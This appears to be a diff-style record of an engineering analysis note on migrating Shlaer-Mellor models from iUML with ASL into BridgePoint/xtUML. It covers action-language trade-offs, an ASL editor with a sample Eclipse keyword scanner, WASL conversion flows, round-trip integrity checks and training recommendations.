months\n|===\n\nSyntax highlighting is relatively simple within an Eclipse environment.\nA set of keywords can be defined and associated with the text editor.\nThrough pattern matching, the text editor highlights any of the words\nfound in the keyword configuration file.\n\n
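A rough sketch of the mechanism follows, assuming a JFace-based text editor.\nThe class name and the keyword subset are illustrative only and do not\nrepresent the full ASL vocabulary.\n\n[source,java]\n----\nimport org.eclipse.jface.text.TextAttribute;\nimport org.eclipse.jface.text.rules.IRule;\nimport org.eclipse.jface.text.rules.IToken;\nimport org.eclipse.jface.text.rules.IWordDetector;\nimport org.eclipse.jface.text.rules.RuleBasedScanner;\nimport org.eclipse.jface.text.rules.Token;\nimport org.eclipse.jface.text.rules.WordRule;\nimport org.eclipse.swt.SWT;\nimport org.eclipse.swt.graphics.Color;\n\n\/\/ colors and emboldens an illustrative subset of ASL keywords\npublic class AslKeywordScanner extends RuleBasedScanner {\n\n    private static final String[] KEYWORDS = {\n        \"if\", \"then\", \"else\", \"endif\", \"loop\", \"endloop\", \"breakif\",\n        \"for\", \"endfor\", \"create\", \"delete\", \"find\", \"link\", \"unlink\",\n        \"generate\" };\n\n    public AslKeywordScanner(Color keywordColor) {\n        IToken keyword = new Token(new TextAttribute(keywordColor, null, SWT.BOLD));\n        WordRule words = new WordRule(new IWordDetector() {\n            public boolean isWordStart(char c) { return Character.isLetter(c); }\n            public boolean isWordPart(char c) { return Character.isLetterOrDigit(c) || c == '-'; }\n        });\n        for (String k : KEYWORDS) {\n            words.addWord(k, keyword);\n        }\n        setRules(new IRule[] { words });\n    }\n}\n----\n\n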
Automatic indentation can be accomplished using regular expressions on a\nline by line basis. The standard text editor is extended to use a class\nthat supplies these rules. An Eclipse extension exists to assist with this;\nthis extension has been used in the OAL editor.\n\nName validation is the first feature to require a parser generated\nfrom a Backus-Naur form (BNF or EBNF) grammar of the language.\nName validation links the textual action language with the structural\nelements of the language such as classes, associations, events, etc.\nWhen parsing the activities, the names used in the action language\ncan be validated against the containing xtUML model. Syntax errors\ncan be highlighted right away without the need to invoke the back end\ncompiler tool chain. Name validation can be done \"real-time\" while\ntyping or as an overall model parse batch process.\n\nContext-sensitive content assistance was recently added to OAL in\nBridgePoint and was received with acclaim [<<dr-6,2.6>>]. The user experience\nis enhanced, and the productivity improvement is measurable. The feature\nrequires a parser that dynamically links to structural elements in the\nmodel and provides lists of candidates for the next lexeme in the currently\nedited action language statement.\n\nRename\/refactoring updates action language when structural model elements\nare renamed or deleted. The feature proactively helps the user update\nthe actions affected by a particular model edit. This is a complex feature\nwith subtleties that must be considered carefully. Such rename\/refactoring\nis a feature of the MASL activity editor.\n\n=== WASL2MASL\nWASL is a textual representation of a model including both structural\nand activity definitions. WASL represents class, association, state,\nand transition instances as well as action language activities.\nLikewise, MASL can represent the fullness of the Shlaer-Mellor semantics\nfor an application model. Both languages are derivatives of the same\nmethodology and roughly the same meta-model. There is a mapping of\nstructural elements, and ASL activity semantics are a subset of MASL\nactivity semantics. Therefore, WASL can potentially be converted to MASL.\n\nThe distinction of manual versus automatic conversion of activities\nis interesting, because it is likely that WASL will be converted to\nxtUML+ASL as a first step in the tooling migration process. As such,\nit will be true that WASL models will have already been converted into\nxtUML+ASL by the time a MASL conversion is needed. This leaves only\nthe activities to be converted.\n\nNote that this conversion is valuable only if MASL is selected as the action\nlanguage now or at some future date. Otherwise, this conversion has limited\nvalue (in the case of using a MASL-compatible model compiler) or no value\nat all.\n\nOptions for converting WASL to MASL include manual and automatic\nconversion. Three approaches could be taken:\n\n[options=\"header\"]\n|===\n| conversion strategy | ROM effort\n| WASL to xtUML to MASL with manual conversion of ASL activities | linear in the quantity of ASL\n| WASL to xtUML to MASL with automatic conversion of ASL activities | 3 months (post initial migration)\n| full textual WASL to full textual MASL | 4 months\n|===\n\n=== WASL2xtUML\nConsidering <<wasl-flow>>, WASL2xtUML is the conversion and import flow.\nIt is the top stream starting with WASL and ending with xtUML-with-ASL\neditable with the BridgePoint tool.\n\nPrototyping has confirmed that a utility called `m2x` can be leveraged.\n`m2x` stands for MASL-to-xtUML. `m2x` was built as part of Raven [<<dr-3,2.3>>].\nThe first step in the flow is a conversion of the input to\n\"serial MASL\" (SMASL) [<<dr-5,2.5>>] using a parser. Even though WASL is not\nthe same as MASL, the parser in the flow can be replaced to do a similar\nconversion on WASL. A prototype parser (`WaslParser`) has been written that\npartially converts WASL to SMASL. This allows `m2x` to be reused (with\na few changes) to populate the xtUML meta-model with instances representing\nthe input model.\n\n[options=\"header\"]\n|===\n| conversion task | ROM effort\n| convert Relationships and Events test models as prototypes | 1 month\n| convert arbitrary WASL models with round trip integrity checking | 4 months\n|===\n\nThis work is required in the initial phase to accomplish automated model\nconversion. A command line interface to the conversion is necessary.\n\n==== Diagram Editing\nWASL contains no graphical diagram information. The semantics of the\nmodel are carried without placement, spatial or size data. 
The present\nunderstanding is that graphical information is effectively trapped within\nthe iUML tool. Graphical information will need to be restored to diagrams\nwith a combination of automatic graphics reconciliation and manual\narrangement.\n\nBridgePoint has the capability to perform graphics reconciliation\n(generate graphics) on semantic model data. However, the layout is\nlimited. Graphical elements are positioned such that they are not\non top of each other. Normally they are lined up side by side across\nthe top of a diagram canvas. The user is left to drag the elements\n(classes, states, packages) around and straighten the connectors\n(class associations and state transitions).\n\nTwo connector routing algorithms are supported in BridgePoint:\n`Oblique` (default) and `Rectilinear`. Oblique routing uses a direct\nrouting strategy including diagonal lines. Rectilinear routing\nemploys right angles.\n\nNo specific engineering is required in a model migration. Diagram\nediting and layout can be handled procedurally.\n\n=== xtUML2WASL\nConsidering <<wasl-flow>>, xtUML2WASL is the export flow.\nIt is the bottom stream starting with xtUML and ending with the flat\nASCII representation WASL consumable by the WACA model compiler.\n\nPrototyping has confirmed that a utility called `x2m` can be leveraged.\n`x2m` stands for xtUML-to-MASL. `x2m` was built as part of the\nRaven [<<dr-3,2.3>>] project. `x2m` converts xtUML to serialized MASL. In\nthe MASL flow, the serialized MASL is processed by a model-based model\ncompiler called `masl`. Much of this model compiler can be reused and\nits back end replaced to render WASL instead of MASL. The resulting\nexecutable would be called `wasl`. (See <<wasl-flow>>.)\n\n[options=\"header\"]\n|===\n| conversion task | ROM effort\n| convert Relationships and Events models from xtUML into WASL | 1 month\n| arbitrary xtUML-to-WASL with round trip integrity checking | 4 months\n|===\n\nThis work is required in the initial phase to accomplish automated\nmodel conversion. Access to this export functionality would be supplied\nboth to the GUI (within BridgePoint) and from the command line.\n\n=== File Formats\nWASL data is stored in a hierarchical set of directories and flat ASCII files.\nThe file formats have been documented by the user. A spreadsheet containing\nextracted model data with labeled header columns can be found here [<<dr-7,2.7>>].\n\n=== Integrity\nA mechanism for ensuring the integrity of model conversion was created for\nMASL to xtUML and xtUML to MASL. The mechanism recognizes that models\nneed to be converted in \"both directions\", from MASL to xtUML and from xtUML\nto MASL. Thus, a model can be converted and then converted back and compared\nto the original input.\n\nWASL can be converted to xtUML, and that xtUML model can then be exported\nas WASL. The output WASL of the second step can be compared to the input WASL\nof the first step. Allowing for non-semantic ordering and spacing, the\nfile contents should be identical.\n\nThis process can be automated.\n\n
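A minimal sketch of such an automated comparison is shown below. It assumes\nthat ordering differences are confined to whole lines and that a simple sort\nis an acceptable canonical form; a real comparison would need to respect\nwhich WASL sections are genuinely order-insensitive. `WaslCompare` is a\nhypothetical name, not an existing tool.\n\n[source,java]\n----\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.List;\nimport java.util.stream.Collectors;\n\npublic final class WaslCompare {\n\n    \/\/ trim whitespace, drop blank lines and sort, yielding a canonical form\n    static List<String> canonical(Path file) throws IOException {\n        return Files.readAllLines(file).stream()\n                .map(String::trim)\n                .filter(line -> !line.isEmpty())\n                .sorted()\n                .collect(Collectors.toList());\n    }\n\n    public static void main(String[] args) throws IOException {\n        boolean same = canonical(Paths.get(args[0]))\n                .equals(canonical(Paths.get(args[1])));\n        System.out.println(same ? \"MATCH\" : \"DIFFER\");\n        if (!same) {\n            System.exit(1);\n        }\n    }\n}\n----\n\n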
==== WASL Round-Trip\n_Round-Trip Testing_ automates the above integrity checks on\narbitrary sets of models. Round-trip testing was used in a previous\nproject to validate the conversion process on proprietary user models\nsecured on a private internal network. The user ran the round-trip\ntesting script on subsets of to-be-converted customer models. Problems\nwere encountered. The user crafted small, non-proprietary test models\nwhich isolated the problem construct. The problem was reported to the\nBridgePoint engineering team along with the reproduction model.\nIssues were resolved until 100% of the user model repository converted\ncleanly. See <<roundtrip-image>>.\n\n[[roundtrip-image]]\nimage::roundtrip.png[Round Trip Testing]\nRound Trip Testing of User Models\n\nA round-trip testing approach can be taken with WASL. A script can\nbe created which automates the conversion\/import of WASL models into\nBridgePoint followed by the export of WASL from BridgePoint\/xtUML.\nThe output can be compared to the input. A report (scorecard) can\nbe generated. The scorecard can be driven to 100% success.\n\n* The script can be run behind a secure firewall on actual user\nmodel data. Then results can be reported without exposing user IP.\n* Small models that reproduce errors identified can be created and\nadded to a regression test suite.\n* The process is clear and measurable and drives out defects.\n\n=== Configuration Management Analysis\n\n[[clearcase-flow]]\nimage::clearcase.png[ClearCASE Revision Progression]\nClearCASE Revision Progression\n\nConfiguration management is supplied in the BridgePoint tool. However,\nconfiguration management is not a component of BridgePoint proper.\nBridgePoint is built upon an Eclipse [<<dr-9,2.9>>] framework. This allows the\nengineering of BridgePoint to focus on modeling and methodology.\nA separation of concerns is made between model editing\/simulation\/compilation\nand the underlying concerns such as desktop organization, color schemes,\nfonts, menu frameworks, file system access, target code compilation and\nconfiguration management.\n\nIn BridgePoint, configuration management is supplied through an Eclipse API\ncalled _TEAM_. The TEAM interface abstracts configuration management away\nfrom the specifics of particular CM implementations such as Git, CVS,\nSubversion, ClearCASE, Dimensions and others. Check-out,\ncheck-in, branch, merge and the like are supported but operate on file\nsystem resources such as files and directories.\n\nBridgePoint persists its model data as ASCII files on the file system\n(presently in an SQL syntax). A model is logically and semantically\nsubdivided into Eclipse projects and UML _packages_. This partitioning\nallows models to be version-controlled in a scalable fashion that enables\nteams of engineers to work in parallel at the domain level, class diagram\nlevel or at the level of individual classes and state machines.\n\nNote that since BridgePoint persists model data as ASCII files in an open,\naccessible and documented format, users have the option of performing\nconfiguration management independently from the BridgePoint tool.\nIn such a situation no dependencies on Eclipse, TEAM and\/or BridgePoint\nexist. It is reassuring to understand that user data is completely open and\ncan be managed in the way best suited to existing source code management\nprocedures.\n\nThe Eclipse TEAM API is accessed naturally while editing model elements\nwithin the model hierarchy. Checking out and checking in models are\naccomplished in a manner consistent with other forms of source code.\n\n=== WACA Model Compiler Migration\nWACA represents valuable intellectual property (IP). It embodies the\nsoftware architecture. Rules of translation from Shlaer-Mellor platform\nindependent models (PIMs) are manifest as a separate concern. WACA contains\nno application-specific information; it is platform specific. 
Multiple\napplications are translated with this model compiler.\n\nModel-based model compilation technology is advancing. Model-based model\ncompilers are more portable and can be developed to generate code faster\nthan previous approaches. WACA follows the traditional interpreted\narchetype approach to code generation. Effort to convert it to newer\napproaches would take time and require access to the architecture source.\n\n== Conclusions and Recommendations\n\nAs stated in <<Introduction and Background>>, there are significant\nchallenges to face. However, this project has the advantage of following\nproject Raven [<<dr-3,2.3>>], which shared a similar set of requirements\nand produced tooling that can be leveraged to a significant extent.\nThe Raven project spanned roughly two calendar years with varying degrees\nof engineering and engagement during that time. A larger quantity of\nmodel data needed to be migrated. There was no room for flaws in the\nmigration process; 100% integrity needed to be achieved. The requirements\non editing the models were similar to the present project. A model\ncompiler tool chain was to be preserved; this was accomplished.\n\nThe fundamental conclusion is that a migration from iUML with ASL activities\nonto BridgePoint with ASL activities is feasible. The cost in terms of\nengineering effort will be significantly lower based on work already done\nin Raven and during this Assessment.\n\nThe recommendation of One Fact is to proceed with a migration and retain\nASL as the action language during the migration.\n\nMASL should be considered as an alternate action language at some point\nafter a migration. But at the present time, reasons to switch are not\ncompelling.\n\nThe following sections will highlight conclusions and recommendations\nitem by item. These sections are not intended to replace Software\nRequirements Specifications, project plans, and Statements of Work.\nThese sections simply summarize the results of the Assessment and\ncommunicate a high level overview of recommended Next Steps.\nSizings, resource allocation and time schedules will be more accurately\nprovided in project documentation should such projects be commissioned.\n\n=== Action Language\nThis analysis concludes that a migration staying with ASL is the best first\nstep even if a migration to MASL (next choice) is desired in the future.\nWe recommend that ASL be used as the action language for the immediate\nfuture. We recommend that MASL be considered after a successful migration\nof existing models.\n\n. Stay with ASL until the tool migration is complete.\n. Consider MASL as a long term strategy.\n\n=== ASL Editor\n. Add keyword highlighting in the first version of the ASL activity editor.\nThis will avoid a sense of \"stepping backwards\" from the iUML activity editor.\n. Add auto-indentation; it is relatively low effort for a nice feature.\n. Plan for real-time name validation and context-sensitive assistance.\n. At a later time, consider the cost\/benefit of rename\/refactor.\n\nMost of this work is best done by the BridgePoint engineering team.\nHowever, it may be a consideration to explore porting the iUML simulator\nto parse ASL activities to vet out syntax errors before compilation.\n\n=== WASL2MASL\n- This will be valuable if a migration to MASL is decided upon in the\nfuture. It is of no value otherwise.\n\n=== WASL2xtUML\n- This is core. 
Perform this task in the first phase of development.\n- Provide a command line interface to the conversion to support automation.\n- Retain the BridgePoint engineering team for this work.\n\n=== xtUML2WASL\n- This is core. Perform this task in the first phase of development.\n- Obtain capability from within BridgePoint and from the command line.\n- Retain the BridgePoint engineering team for this work.\n\n=== File Formats\n- Using the documented file formats, build a parser to consume these files\nas part of WASL2xtUML conversion.\n\n=== Conversion Integrity and WASL Round Trip\n- In order to satisfy the need for high integrity in the conversion of\nWASL to xtUML and xtUML to WASL, employ the round-trip strategy to achieve\na high degree of confidence in the conversion. This also reduces the risk of\nwasted graphical editing effort on models that need to be reconverted.\n- The tooling for this work is best done by the BridgePoint engineering\nteam. Running the scripts locally is best done by a local engineer with\naccess to the model data.\n\n=== Diagram Editing\n1. Be certain model conversion is sound before performing manual diagram\nrearrangement.\n2. Consider rearranging diagram layouts as needed. There may be little\nreason to lay out a diagram that is not being viewed on a regular basis.\n3. Employ `Oblique` and `Rectilinear` routing strategies during layout.\n4. Employ your own engineering talent for this work due to security\nclearance requirements.\n\n=== xtUML and BridgePoint Training\nIt is important to ramp up tooling knowledge within the organization.\nKnowledge transfer begins with a few people and spreads to many, so that\ndeep expertise is held by a few and working knowledge by everyone else.\nTooling and methodology expertise forms a continuum: it is at its peak\n(in both capability and cost) outside the company with consultants, is\nstrong in a few people inside the shop, and is adequate with everyone\nelse using the tool.\n\nTo achieve this balance, a plan must be established. Following are\nrecommendations to be incorporated into the training plan.\n\n. Designate one or two internal champions now.\n. Begin training up the local champion during the Assessment and through\nthe first phase of the model\/tool migration projects.\n. Use a combination of online resources and on-site training.\n. Have a few engineers work through the online training materials.\n. Designate a primary contact to the BridgePoint team and to the xtUML\nCommunity including access to BridgePoint issue trackers and configuration\nmanagement repositories.\n. Schedule the _Basic xtUML Modeling_ course for the champion and a few\nearly adopters.\n. Plan to push training deeper into the organization as modeling projects\nroll out.\n\n==== Example Model\nDuring the Raven project, it became clear that the BridgePoint development\nteam needed to model in the MASL dialect. It was important that the engineers\nbuilding the tools were using the tools in that specific user mode. Thus\nthe engineers could experience (both good and bad) what MASL modelers were\nexperiencing. In the Raven project, this realization came relatively late.\nThe example model serves as another test model to run through the process,\nbut more importantly, it serves as editing experience.\n\nAn ASL dialect project may learn from this experience and commission an\nexample application model early on. The GPS Watch is a prime candidate\nfor such a model. It has already been modeled in OAL and MASL action\nlanguages.\n\n. 
Commission the creation of a reasonable application test model exhibiting\nthe ASL dialect.\n. Build such a model in the public domain as open source and stored alongside\nother xtUML applications so that users and potential users may find it.\n. Consider building this model as a shared effort between both client and\nsupplier so that a maximum of knowledge exchange occurs.\n. Choose the GPS Watch application for this effort. It will provide the\nlargest return on the smallest investment.\n\n\n=== Configuration Management\n. Adopt a configuration management strategy that is compatible with the\nversion control of other source artifacts in your organization (probably\nClearCASE).\n. Spend time practicing configuration management of BridgePoint xtUML models.\n - create a branch\n - check-out\n - check-in\n - merge branches\n - resolve a conflict\n\n=== Model Compiler Migration\nAt this point, WACA should be preserved and reused. Migration away from\nWACA should be considered only after a successful migration of iUML\napplication models into new tooling.\n\n. Protect and preserve the IP of the WACA model compiler.\n. Consider options for improving the throughput and maintainability of WACA\nafter initial model migration has settled.\n. Consider placing WACA into the public domain at some point in the future.\nThis may result in community engagement and additional resources maintaining\nthe architecture.\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","old_contents":"= Analyze Options for ASL BridgePoint\n\nxtUML Project Analysis Note\n\n:sectnums:\n\n== Abstract\n\nThis note documents research into a migration of Shlaer-Mellor application\nmodels from iUML into BridgePoint. Options are explored, and observations\nare recorded.\n\n== Document References\n\n. [[dr-1]] https:\/\/support.onefact.net\/issues\/10414[10414 Analyze Options for Migration]\n. [[dr-2]] https:\/\/docs.google.com\/document\/d\/1LQYNA7Zln1h8h8wbRNeZb0GukVMXLV89nSwg8SICeG4\/edit[SRS - Software Requirements Specification for client Assessment]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/8269[8269 - Raven Project Phase 1]\n. [[dr-4]] http:\/\/www.ooatool.com\/docs\/ASL03.pdf[UML ASL Reference Guide]\n. [[dr-5]] link:..\/8073_masl_parser\/8277_serial_masl_spec.md[Serial MASL (SMASL) Specification]\n. [[dr-6]] https:\/\/www.youtube.com\/watch?v=lmZJ44ceDD8[OAL Context-Sensitive Content Assist]\n. [[dr-7]] link:ExtractionWithHeaders.xlsx[File Formats: Extraction with Headers]\n. [[dr-8]] TBD - delivered prototype(s)\n. [[dr-9]] http:\/\/www.eclipse.org\/[Eclipse - IDE Framework from the Eclipse Foundation]\n\n== Introduction and Background\n\nAs of 2017, models built with iUML and having _MASL_ (_Model and Action\nSpecification Language_) activities (action language bodies) can be migrated\ninto BridgePoint using a tool chain built for project Raven [<<dr-3,2.3>>].\nIn Raven, tools were constructed to convert iUML models expressed as MASL\ninto xtUML. The xtUML could then be imported into BridgePoint. Tools were\nbuilt to export xtUML models (back) into the MASL format. A similar process\nis desired for models built with iUML and having _ASL_ (_Action Specification\nLanguage_), activities. In the new flow, tools would be used to convert iUML\nmodels in WASL format into xtUML. 
Tools would be available to export xtUML\nmodels from BridgePoint (back) into the WASL format.\n\nThe native iUML action language, ASL, has a syntax in the public domain.\nA language reference for it can be found in [<<dr-4,2.4>>]. ASL is\nfundamentally similar to _OAL_ (_Object Action Language_), the default\naction language of BridgePoint, however it is a bit richer and supports\ninstance identity more tightly on the create statement. There are other\nadvantages and disadvantages as described in <<Action Language Comparison>>.\n\niUML models can be represented in a form consumable by a software\narchitecture (model compiler) called _WACA_ (_Waterloo Auto Code\nGenerator and Architecture_). This form shall be denoted _WASL_\n(WACA-with-ASL).\n\nSeveral paths exist to move forward from iUML\/ASL. This assessment is\nintended to traverse these paths and explore different options which enable\nShlaer-Mellor Model-Driven Development to continue into future engineering\nprojects. Options include changing the model editing environment and\nswitching to a different action language. However, it is desired that\nthe back end model compiler tool chain be preserved to a large extent.\n\nThe highlights of this assessment report include:\n\n- choice of action language\n- challenge of transforming WASL to xtUML (for conversion\/import)\n- challenge of generating WASL from xtUML (export to model compiler)\n- loss and regeneration\/re-layout of model graphical diagram information\n- testing and validation of the integrity of the conversions\n\nThe following figure <<wasl-flow>> will be referenced throughout the report.\nTwo flows are outlined, import (upper flow) and export (lower flow). The\ngreen triangular glyph represents xtUML. 'SMASL' is a serialized form\nof Shlaer-Mellor meta-model instances. 'm2x' is a converter of SMASL\nto xtUML. 'x2m' is a converter of xtUML to SMASL. 'wasl' is a converter\nof SMASL to WASL.\n\n[[wasl-flow]]\nimage::waslflow.png[WASL-to-xtUML and xtUML-to-WASL Flows]\nWASL-to-xtUML and xtUML-to-WASL Flows\n\nIn the following sections, the report (re)states the requirements of the\nAssessment and then provides substantial analysis. After the analysis\nis a section drawing conclusions and posing recommendations.\n\n== Requirements\n\nRequirements for an assessment of migration options are defined in a\nSoftware Requirements Specification (SRS) document [<<dr-2,2.2>>].\nThe requirements are repeated here with minor refinement.\n\n=== (A2.1) Action Language SWOT\nAnalyze the relative strengths, weaknesses, opportunities and threats of\nASL versus MASL versus OAL moving forward.\n\n=== (A2.2) ASL Editor\nExplore and size an ASL action language syntax highlighting editor.\n\n=== (A2.3) WASL2MASL\nAnalyze the costs and benefits of building a tool to convert WASL to MASL.\n\n=== (A2.4) WASL2xtUML\nUnderstand the work required to convert models from iUML-ASL (WASL) into\nxtUML to be edited within BridgePoint (model conversion and import).\n\n==== (A2.4.1) Diagram Editing\nEnumerate diagram editing issues anticipated as part of model conversion\nand ongoing editing of Kennedy-Carter idiom models in BridgePoint.\nInclude graphics issues and known differences between dialects of xtUML.\n\n=== (A2.5) xtUML2WASL\nDetermine a strategy for exporting xtUML into the existing model compiler\ntool chain (model export). 
Determine packaging for the extraction tool\nas a BridgePoint plugin, standalone tool or both.\n\n=== (A2.6) File Formats\nIsolate the interface to the model compilation tool chain and document\nfile formats noting that example files are supplied by the client.\n\n=== (A2.7) Integrity\nDefine steps to ensure and validate the integrity of models through\nthe conversion process.\n\n==== (A2.7.1) Round Trip\nExplore the use of \"round trip testing\" to automate the import and export\nand comparison of results.\n\n=== Decision Data\nFor each of the above requirements, consider the following:\n\n(A3) Sizings::\nEstablish relative sizings for various components and design choices.\n\n(A4) Open Sourcing:: [Removed from scope.]\n\n(A5) Talent Pool::\nRecommend the use of internal versus external talent and the community.\n\n(A6) Prototypes::\nDevelop working prototypes and\/or mock ups of workflows with screenshots\nleveraging supplied example files.\n\n(A7) Training::\nRecommend training in modeling and tooling or ad hoc consultation.\n\n(A8) Configuration Management::\niUML provides change configuration inside the tool (versions of domains\nand projects defined as a set of domains at a particular version).\nAnalysis shall propose a path to migrate a particular version of the\ncurrent application models and describe how configuration would be managed\nafter migration.\n\n(A9) Model Compiler Migration::\nFollowing UML tool migration, model compiler migration would be the\nlogical next step. Perform analysis and define a roadmap for this.\n\n== Analysis\n\nIn the following analysis the challenges of a tool migration from iUML\nto BridgePoint are explored. Each requirement listed above is independently\nanalyzed. Explanations provide insight into feasibility, engineering\ndifficulty and impact on the modelers using the tools.\n\nRough order of magnitude (ROM) estimates of effort are provided for many\nof the options. Note that these estimates are quite rough and based on\ninformation available at the time. Refinement of these estimates can be\nobtained through the design process as details into implementation are\ngathered. Please use these ROM effort estimates as just that, estimates.\nThe estimates are presented in units of (hu)man-weeks and man-months.\nCalendar time is not considered.\n\n=== Action Language Comparison\nAction language support is at the center of the challenges facing a tooling\nmigration. There are at least four action language possibilities in this\nmigration: ASL, OAL, MASL and Alf. Others may exist, but the ones explored\nand reported here can be considered true candidates.\n\nIt is important to note that some textual action languages are able\nto represent the structure of a model in addition to representing the\nprocessing of action bodies. For example, MASL has textual syntax to\nexpress the structure of classes and define associations between\nthem. MASL provides textual syntax to represent the entirety of\nthe semantics of Shlaer-Mellor models. Graphics are an additional view\nof the structural model information. Alf is another language that supplies\nsyntax for activities and (some) structural model elements. ASL and OAL\nare limited to expressing action processing. 
WASL extends ASL to include\na textual representation of structural Shlaer-Mellor.\n\n[options=\"header\"]\n|===\n| dialect | strengths | weaknesses | opportunities | threats\n| ASL | no change to existing flow | lack of BP interpreter | grow community | lack of parser\n| | direct pass-thru to WACA | not parsed (initially) | enhance BP |\n| | smallest change to tooling | no `else if` | |\n| | familiar to existing team | | |\n| | lowest initial cost | | |\n| | first step in any case | | |\n| | | | |\n| OAL | BridgePoint native default | conversion required | enhance syntax | behavior differences\n| | interpreted in Verifier | learning curve | go mainstream |\n| | large body of examples | less rich syntax | |\n| | alternate model compilers | | |\n| | | | |\n| MASL | richest syntax | conversion required | expressiveness | few users\n| | strongest typing | learning curve | broaden usage |\n| | local (UK) user community | | |\n| | proximity to Ada target | | |\n| | | | |\n| Alf | standardized by OMG | conversion required | standardization | distraction\n| | | gaps in the semantics | enhance BP |\n| | | lack of BP interpreter | |\n| | | overly complex syntax | |\n| | | learning curve | |\n|===\n\n=== ASL Editor\nAn ASL text editor could be produced that makes the experience of editing\nASL activities pleasant and productive (in that order!).\nThere are multiple levels of sophistication to preparing such an editor.\nListed here are features of a syntax highlighting editor ordered from\nrelatively easy to more challenging to implement.\n\nNo prototypes were produced of an ASL text editor.\n\n[options=\"header\"]\n|===\n| feature | description | parser | ROM effort\n| keyword highlighting | embolden and\/or colorize language key words | | 1 week\n| automatic indentation | Indent after `if`, `else`, `loop`, etc. | | 2 weeks\n| name validation | Rationalize identifiers with model elements. | required | 1 month\n| context-sensitive content assistance | auto-completion and selection lists | required | 2 months\n| rename\/refactoring | Update activities when model element names change. | required | 4 months\n|===\n\nSyntax highlighting is relatively simple within an Eclipse environment.\nA set of keywords can be defined and associated with the text editor.\nThrough pattern matching, the text editor highlights any of the words\nfound in the keyword configuration file.\n\nAutomatic indentation can be accomplished using regular expressions on a\nline by line basis. The standard text editor is extended to use a class\nthat supplies these rules. An Eclipse extension exists to assist with this;\nthis extension has been used in the OAL editor.\n\nName validation is the first feature to require a parser generated\nfrom a Backus-Naur form (BNF or EBNF) grammar of the language.\nName validation links the textual action language with the structural\nelements of the language such as classes, associations, events, etc.\nWhen parsing the activities, the names used in the action language\ncan be validated against the containing xtUML model. Syntax errors\ncan be highlighted right away without the need to invoke the back end\ncompiler tool chain. Name validation can be done \"real-time\" while\ntyping or as an overall model parse batch process.\n\nContext-sensitive content assistance was recently added to OAL in\nBridgePoint and was received with acclaim [<<dr-6,2.6>>]. The user experience\nis enhanced, and the productivity improvement is measurable. 
The feature\nrequires a parser that dynamically links to structural elements in the\nmodel and provides lists of candidates for the next lexeme in the currently\nedited action language statement.\n\nRename\/refactoring updates action language when structural model elements\nare renamed or deleted. The feature proactively helps the user update\nthe actions affected by a particular model edit. This is a complex feature\nwith subtleties that must be considered carefully. Such rename\/refactoring\nis a feature of the MASL activity editor.\n\n=== WASL2MASL\nWASL is a textual representation of a model including both structural\nand activity definitions. WASL represents class, association, state,\nand transition instances as well as action language activities.\nLikewise, MASL can represent the fullness of the Shlaer-Mellor semantics\nfor an application model. Both languages are derivatives of the same\nmethodology and roughly the same meta-model. There is a mapping of\nstructural elements, and ASL activity semantics are a subset of MASL\nactivity semantics. Therefore, WASL can potentially be converted to MASL.\n\nThe distinction of manual versus automatic conversion of activities\nis interesting, because it is likely that WASL will be converted to\nxtUML+ASL as a first step in the tooling migration process. As such,\nit will be true that WASL models will have already been converted into\nxtUML+ASL by the time a MASL conversion is needed. This leaves only\nthe activities to be converted.\n\nNote that this conversion is valuable only if MASL is selected as the action\nlanguage now or at some future date. Otherwise, this conversion has limited\nvalue (in the case of using a MASL-compatible model compiler) or no value\nat all.\n\nOptions for converting WASL to MASL include manual and automatic\nconversion. Three approaches could be taken:\n\n[options=\"header\"]\n|===\n| conversion strategy | ROM effort\n| WASL to xtUML to MASL with manual conversion of ASL activities | linear in the quantity of ASL\n| WASL to xtUML to MASL with automatic conversion of ASL activities | 3 months (post initial migration)\n| full textual WASL to full textual MASL | 4 months\n|===\n\n=== WASL2xtUML\nConsidering <<wasl-flow>>, WASL2xtUML is the conversion and import flow.\nIt is the top stream starting with WASL and ending with xtUML-with-ASL\neditable with the BridgePoint tool.\n\nPrototyping has confirmed that a utility called `m2x` can be leveraged.\n`m2x` stands for MASL-to-xtUML. `m2x` was built as part of Raven [<<dr-3,2.3>>].\nThe first step in the flow is a conversion of the input to\n\"serial MASL\" (SMASL) [<<dr-5,2.5>>] using a parser. Even though WASL is not\nthe same as MASL, the parser in the flow can be replaced to do a similar\nconversion on WASL. A prototype parser (`WaslParser`) has been written that\npartially converts WASL to SMASL. This allows `m2x` to be reused (with\na few changes) to populate the xtUML meta-model with instances representing\nthe input model.\n\n[options=\"header\"]\n|===\n| conversion task | ROM effort\n| convert Relationships and Events test models as prototypes | 1 month\n| convert arbitrary WASL models with round trip integrity checking | 4 months\n|===\n\nThis work is required in the initial phase to accomplish automated model\nconversion. A command line interface to the conversion is necessary.\n\n==== Diagram Editing\nWASL contains no graphical diagram information. The semantics of the\nmodel are carried without placement, spatial or size data. 
The present\nunderstanding is that graphical information is effectively trapped within\nthe iUML tool. Graphical information will need to be restored to diagrams\nwith a combination of automatic graphics reconciliation and manual\narrangement.\n\nBridgePoint has the capability to perform graphics reconciliation\n(generate graphics) on semantic model data. However, the layout is\nlimited. Graphical elements are positioned such that they are not\non top of each other. Normally they are lined up side by side across\nthe top of a diagram canvas. The user is left to drag the elements\n(classes, states, packages) around and straighten the connectors\n(class associations and state transitions).\n\nTwo connector routing algorithms are supported in BridgePoint,\n`Oblique` (default) and `Rectilinear`. Oblique routing uses a direct\nrouting strategy including diagonal lines. Rectilinear routing\nemploys right angles.\n\nNo specific engineering is required in a model migration. Diagram\nediting and layout can be handled procedurally.\n\n=== xtUML2WASL\nConsidering <<wasl-flow>>, xtUML2WASL is the export flow.\nIt is the bottom stream starting with xtUML and ending with the flat\nASCII representation WASL consumable by the WACA model compiler.\n\nPrototyping has confirmed that a utility called `x2m` can be leveraged.\n`x2m` stands for xtUML-to-MASL. `x2m` was built as part of the\nRaven [<<dr-3,2.3>>] project. `x2m` converts xtUML to serialized MASL. In\nthe MASL flow, the serialized MASL is processed by a model-based model\ncompiler called `masl`. Much of this model compiler can be reused and\nits back end replaced to render WASL instead of MASL. The resulting\nexecutable would be called `wasl`. (See <<wasl-flow>>.)\n\n[options=\"header\"]\n|===\n| conversion task | ROM effort\n| convert Relationships and Events models from xtUML into WASL | 1 month\n| arbitrary xtUML-to-WASL with round trip integrity checking | 4 months\n|===\n\nThis work is required in the initial phase to accomplish automated\nmodel conversion. Access to this export functionality would be supplied\nboth to the GUI (within BridgePoint) and from the command line.\n\n=== File Formats\nWASL data is stored in 